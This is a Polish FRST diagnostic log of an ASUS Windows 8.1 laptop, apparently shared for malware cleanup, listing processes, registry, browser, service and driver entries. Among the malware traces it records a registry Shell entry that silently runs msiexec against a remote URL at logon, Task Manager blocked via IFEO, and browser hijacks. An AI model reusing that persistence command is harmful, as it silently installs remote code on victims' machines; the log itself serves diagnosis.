Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 05-05-2017 02
Uruchomiony przez K (administrator) ASUS (06-05-2017 09:35:26)
Uruchomiony z C:\Users\K\Downloads
Załadowane profile: K (Dostępne profile: K)
Platform: Windows 8.1 (X64) Język: Polski (Polska)
Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Everbean\Application\chrome.exe" "%1")
Tryb startu: Normal
Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesy (filtrowane) =================

(Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.)

(AMD) C:\Windows\System32\atiesrxx.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(ASUS) C:\Program Files\ASUS\P4G\InsOnSrv.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe
(Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
() C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
(ASUS) C:\Program Files\ASUS\P4G\InsOnWMI.exe
(ASUS) C:\Program Files\ASUS\P4G\BatteryLife.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe
(ASUSTek Computer INC.) C:\ProgramData\AsTouchPanel\AsPatchTouchPanel64.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\QuickGesture\x64\QuickGesture64.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\QuickGesture\x86\QuickGesture.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\x64\3\E_IATIEDE.EXE
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.2.6.547\AsusWSPanel.exe
(Google Inc.) C:\Program Files (x86)\Everbean\Application\chrome.exe

==================== Rejestr (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s**RtHDVCpl****C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe -s**kernel32.dll*
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1353432 2013-09-26] (Realtek Semiconductor)
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [3216032 2013-12-12] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.2.6.547\ASUSWSLoader.exe [63272 2015-12-24] ()
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28432392 2017-05-01] (Dropbox, Inc.)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-11-28] (Atheros Communications)
HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27427808 2017-02-08] (Skype Technologies S.A.)
HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\Run: [EPSON Stylus SX100] => C:\Windows\system32\spool\DRIVERS\x64\3\E_IATIEDE.EXE [221696 2008-02-05] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj83MkYxFTU8FjRWOYJLNUM1M8VYOWMdMTlLNjExMYQQNF== /q
IFEO\DisplaySwitch.exe: [Debugger]
IFEO\taskmgr.exe: [Debugger]
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.2.6.547\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.2.6.547\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.2.6.547\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.16.0.dll [2017-05-01] (Dropbox, Inc.)

==================== Internet (filtrowane) ====================

(Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{233F7B83-2BD6-4C48-A2F1-FE0A38F18606}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{DE1334DC-E4B7-4C41-A6BC-8B82FE77449F}: [DhcpNameServer] 40.54.1.16

Internet Explorer:
==================
HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://asus13.msn.com/?pc=ASJB
HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://asus13.msn.com/?pc=ASJB
SearchScopes: HKU\S-1-5-21-3733692653-1954587215-3579302167-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3733692653-1954587215-3579302167-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2017-03-14] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2017-03-14] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-04-20] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: ye35oxf8.default
FF ProfilePath: C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default [2017-04-21]
FF Extension: (FF Adr) - C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-20] [Brak podpisu cyfrowego]
FF Extension: (Polski Language Pack) - C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-20] [Brak podpisu cyfrowego]
FF SearchPlugin: C:\Users\K\AppData\Roaming\Firefox\Firefox\Profiles\ye35oxf8.default\searchplugins\startsearch.xml [2017-04-20]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-08-22] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)

Chrome:
=======
CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1493272726&from=f6800427&uid=toshibaxmq01abf050_24lscq8atxx24lscq8at&z=f7b6c8b883310632741da66gez7t1cbo0m9oem3o3b
CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1493272726&from=f6800427&uid=toshibaxmq01abf050_24lscq8atxx24lscq8at&z=f7b6c8b883310632741da66gez7t1cbo0m9oem3o3b"
CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1493272726&from=f6800427&uid=toshibaxmq01abf050_24lscq8atxx24lscq8at&z=f7b6c8b883310632741da66gez7t1cbo0m9oem3o3b&q={searchTerms}
CHR DefaultSearchKeyword: Default -> luck
CHR Profile: C:\Users\K\AppData\Local\Google\Chrome\User Data\Default [2017-04-25]
CHR Extension: (Prezentacje Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-08-04]
CHR Extension: (Dokumenty Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-08-04]
CHR Extension: (Dysk Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-27]
CHR Extension: (uBlock Origin) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2017-04-17]
CHR Extension: (Google Search) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Arkusze Google) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-08-04]
CHR Extension: (Dokumenty Google offline) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Skype) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2017-03-09]
CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Gmail) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-04]
CHR Extension: (Chrome Media Router) - C:\Users\K\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-08]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
HKU\S-1-5-21-3733692653-1954587215-3579302167-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) <==== UWAGA

==================== Usługi (filtrowane) ====================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
R2 ASUS InstantOn; C:\Program Files\ASUS\P4G\InsOnSrv.exe [277120 2013-08-29] (ASUS)
R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.0.3.226\AsusWSWinService.exe [71680 2013-08-16] (ASUS Cloud Corporation) [Brak podpisu cyfrowego]
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [318592 2013-11-28] (Windows (R) Win 7 DDK provider) [Brak podpisu cyfrowego]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3042544 2017-03-14] (Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [48944 2017-05-01] (Dropbox, Inc.)
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-20] () <==== UWAGA
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)
R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\Office\PackageLocker.dll [119808 2017-04-20] () [Brak podpisu cyfrowego] <==== UWAGA
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2013-11-28] (Atheros) [Brak podpisu cyfrowego]

===================== Sterowniki (filtrowane) ======================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3880448 2013-11-13] (Qualcomm Atheros Communications, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [138240 2013-06-22] (Advanced Micro Devices)
R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [70928 2013-12-12] (ASUS Corporation)
R3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-11-28] (Qualcomm Atheros)
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-06] ( )
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)
S3 dbx; system32\DRIVERS\dbx.sys [X]
U0 msahci; system32\drivers\msahci.sys [X]

==================== NetSvcs (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

==================== Jeden miesiąc - utworzone pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
2017-05-06 09:35 - 2017-05-06 09:36 - 00020213 _____ C:\Users\K\Downloads\FRST.txt
2017-05-06 09:33 - 2017-05-06 09:35 - 00000000 ____D C:\FRST
2017-05-06 09:33 - 2017-05-06 09:33 - 02429440 _____ (Farbar) C:\Users\K\Downloads\FRST64.exe
2017-05-03 12:09 - 2017-05-03 12:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-05-01 16:49 - 2017-05-01 16:49 - 00048944 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2017-04-28 08:23 - 2017-04-28 08:23 - 00165187 _____ C:\Users\K\Downloads\FAKTURA-P-1884571-17040587026772-00013145 (1).pdf
2017-04-28 08:22 - 2017-04-28 08:22 - 00165187 _____ C:\Users\K\Downloads\FAKTURA-P-1884571-17040587026772-00013145.pdf
2017-04-28 08:14 - 2017-04-28 08:14 - 00400156 _____ C:\Users\K\Downloads\O26_Faktura_indywidualna_000-038-2595-1777_17_04_F004_AB.pdf
2017-04-25 21:29 - 2017-04-25 21:29 - 00000000 ____D C:\Windows\system32\log
2017-04-25 21:29 - 2016-05-23 04:41 - 00055056 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-25 21:29 - 2016-05-19 08:42 - 00052392 _____ (Elex do Brasil Participações Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
2017-04-25 21:28 - 2017-04-25 21:28 - 00000000 ____D C:\Users\K\AppData\Roaming\Elex-tech
2017-04-25 21:28 - 2017-04-25 21:28 - 00000000 ____D C:\Program Files (x86)\Elex-tech
2017-04-20 22:20 - 2017-04-25 21:27 - 00002018 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-20 22:20 - 2017-04-25 21:27 - 00001948 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-20 22:20 - 2017-04-21 22:34 - 00000000 ____D C:\Users\K\AppData\LocalLow\Mozilla
2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Roaming\Mozilla
2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Roaming\Firefox
2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Local\Firefox
2017-04-20 22:20 - 2017-04-20 22:20 - 00000000 ____D C:\Users\K\AppData\Local\Everbean
2017-04-20 22:19 - 2017-05-06 08:25 - 00000000 _____ C:\Users\Public\Documents\report.dat
2017-04-20 22:19 - 2017-05-04 21:30 - 00000115 _____ C:\Users\Public\Documents\temp.dat
2017-04-20 22:19 - 2017-04-20 22:20 - 00000000 ____D C:\Program Files (x86)\Firefox
2017-04-20 22:19 - 2017-04-20 22:19 - 00000000 ____D C:\Program Files (x86)\Everbean
2017-04-20 22:19 - 2017-04-20 22:19 - 00000000 _____ C:\Windows\SysWOW64\33
2017-04-20 22:14 - 2017-04-20 22:19 - 00000000 ____D C:\Program Files (x86)\BiaoJi
2017-04-19 08:29 - 2017-04-19 08:30 - 00025885 _____ C:\Users\K\Downloads\Bez-tytułu-1 (1).odt
2017-04-13 14:55 - 2017-04-13 14:56 - 00003568 _____ C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe
2017-04-13 14:54 - 2017-04-13 14:54 - 00000000 ____D C:\Users\K\AppData\Roaming\SSMgre
2017-04-10 10:56 - 2017-04-13 14:56 - 00003558 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-04-08 09:12 - 2017-04-08 09:12 - 00000000 ____D C:\b568bd67b485a35ae9ab99ccf95c

==================== Jeden miesiąc - zmodyfikowane pliki i foldery ========

(Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.)
2017-05-06 09:24 - 2016-03-10 12:50 - 00000000 __RDO C:\Users\K\SkyDrive
2017-05-06 09:24 - 2015-08-04 20:20 - 00000000 ____D C:\Users\K\AppData\Roaming\Skype
2017-05-06 09:24 - 2015-08-04 19:16 - 00000074 _____ C:\Users\K\AppData\Roaming\sp_data.sys
2017-05-06 09:22 - 2015-08-06 23:15 - 00001150 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-05-06 08:51 - 2014-04-03 06:28 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2017-05-06 08:38 - 2015-08-06 23:15 - 00001154 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-05-06 08:19 - 2017-03-07 09:23 - 00003474 _____ C:\Windows\System32\Tasks\ASUS Live Update1
2017-05-06 08:19 - 2015-08-04 20:42 - 00003464 _____ C:\Windows\System32\Tasks\ASUS Live Update2
2017-05-03 12:18 - 2015-08-04 19:20 - 00003600 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3733692653-1954587215-3579302167-1001
2017-05-03 12:12 - 2017-02-28 22:56 - 00011196 _____ C:\Users\K\Desktop\Ewidencja czasu pracy - umowa zlecenia.xlsx
2017-05-03 12:09 - 2015-08-06 23:14 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-05-03 12:08 - 2015-08-06 23:28 - 00000000 ___RD C:\Users\K\Dropbox
2017-04-30 21:29 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\Inf
2017-04-29 06:52 - 2015-08-04 19:38 - 00003480 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-29 06:52 - 2015-08-04 19:37 - 00003352 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-27 06:30 - 2015-09-09 09:16 - 00000000 ____D C:\Users\K\AppData\Local\CrashDumps
2017-04-22 08:56 - 2013-08-22 17:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-04-22 08:54 - 2015-08-04 20:24 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-04-21 22:54 - 2015-08-04 19:14 - 00000000 ____D C:\Users\K\AppData\Local\Packages
2017-04-20 22:20 - 2015-08-04 19:41 - 00002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
